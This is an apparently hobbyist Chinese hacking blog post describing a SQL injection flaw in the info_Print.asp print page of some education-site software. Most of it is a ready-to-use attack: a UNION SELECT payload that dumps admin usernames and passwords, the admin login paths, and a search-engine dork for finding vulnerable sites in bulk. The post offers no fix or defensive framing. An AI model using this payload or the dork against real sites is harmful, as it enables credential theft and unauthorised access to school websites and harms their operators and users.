当前位置: iick's blog > 网站漏洞 > 教育站打印页面注入漏洞oday

教育站打印页面注入漏洞oday

作者:hack1990 时间:15-12-07 阅读数:1260人阅读

教育站打印页面漏洞存在注入漏洞可直接爆出管理帐号密码(老洞)


漏洞存在页面:info_Print.asp


漏洞类型:注入漏洞


测试漏洞代码


union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin


网站登录后台: 


website/ad_login.asp 


/ad_login.asp



搜索关键字批量检测: inurl:info_Print.asp?ArticleID=


# 教育站打印页面注入漏洞oday# Hack1990.Com

上一篇:mysql查询记录的行号

下一篇:如何在命令行下使用 MySQL 连接数据库不用每次都输入密码

相关文章

发表评论